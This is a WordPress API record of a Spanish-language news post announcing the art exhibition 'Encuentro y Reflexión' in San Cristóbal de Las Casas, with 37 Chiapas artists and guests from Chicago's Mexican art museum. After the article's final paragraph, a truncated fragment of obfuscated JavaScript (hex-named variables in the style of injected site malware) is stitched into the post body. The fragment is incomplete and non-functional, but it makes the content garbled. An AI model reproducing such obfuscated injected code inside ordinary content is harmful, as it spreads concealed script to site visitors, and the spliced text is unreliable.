{"id":939,"date":"2022-03-30T04:02:50","date_gmt":"2022-03-30T04:02:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=939"},"modified":"2022-03-30T04:02:51","modified_gmt":"2022-03-30T04:02:51","slug":"anuncian-la-exposicion-colectiva-encuentro-y-reflexion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=939","title":{"rendered":"Anuncian la exposici\u00f3n colectiva &#8220;Encuentro y Reflexi\u00f3n&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-29-at-2.57.24-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-940\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-29-at-2.57.24-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-29-at-2.57.24-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-29-at-2.57.24-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-29-at-2.57.24-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-29-at-2.57.24-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La exposici\u00f3n colectiva &#8220;Encuentro y Reflexi\u00f3n&#8221; se realizar\u00e1 el pr\u00f3ximo 15 de abril en el Centro Cultural de Los Altos (ex convento de Santo Domingo), cuyo objetivo es proyectar el trabajo de artistas chiapanecos a promotores del arte y cultura mexicano en Estados Unidos que estar\u00e1n presentes en el evento.<\/p>\n\n\n\n<p>Al respecto, el pintor Juan Chawuk coment\u00f3 que la exposici\u00f3n contempla el trabajo de 37 artistas chiapanecos entre pintores, fot\u00f3grafos, escultores, entre otros, donde tambi\u00e9n habr\u00e1 presentaciones musicales y de danza contempor\u00e1nea, con la finalidad que los vean 8 l\u00edderes mexicanos que radican en Estados Unidos y promueven el la cultura y el arte mexicano.<\/p>\n\n\n\n<p>\u201cEstamos invitando a que asistan el pr\u00f3ximo 15 de abril a las 5 de la tarde, estos l\u00edderes vienen a ver la creaci\u00f3n art\u00edstica de Chiapas, dentro de eso pueden ser electos en diferentes disciplinas para mostrar su trabajo en Estados Unidos; ellos tienen un proyecto de hacer exposiciones simult\u00e1neas en varias entidades de all\u00e1 y se proyecte a trav\u00e9s de las redes sociales\u201d.<\/p>\n\n\n\n<p>Asimismo, dijo que espera varios chiapanecos est\u00e9n exponiendo en Estados Unidos \u201cy lo estamos organizando gracias a la Direcci\u00f3n asesor\u00eda de Carlos Tortoledo, quien tiene el mejor museo latino en Estados Unidos y es mexicano, son conexiones para ir fortaleciendo el arte y la cultura de Chiapas\u201d.<\/p>\n\n\n\n<p>Y es que los invitados de honor a este evento son Nahum B. Zenil y al director del Museo de Chicago, Carlos Tortolero,&nbsp; quienes compartir\u00e1n su experiencia sobre su trabajo en la Fundaci\u00f3n del Museo Nacional del Arte Mexicano en EUA.<\/p>\n\n\n\n<p>&#8220;Encuentro y Reflexi\u00f3n&#8221; est\u00e1 organizado por la Asociaci\u00f3n Civil Portales del Arte en Chiapas A.C. en coordinaci\u00f3n con el Museo Nacional de Arte en Chicago y el Centro Cultural de Los Altos de San Crist\u00f3bal de Las Casas. La exposici\u00f3n estar\u00e1 abierta al p\u00fablico del 15 de abril&nbsp; al 15 de junio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La exposici\u00f3n colectiva &#8220;Encuentro y Reflexi\u00f3n&#8221; se realizar\u00e1 el pr\u00f3ximo 15 de abril en el Centro Cultural de Los Altos (ex convento de Santo Domingo), cuyo objetivo es proyectar el trabajo de artistas chiapanecos a promotores del arte y cultura mexicano en Estados Unidos que estar\u00e1n presentes en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":940,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-939","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/939","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=939"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/939\/revisions"}],"predecessor-version":[{"id":941,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/939\/revisions\/941"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/940"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=939"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=939"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=939"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}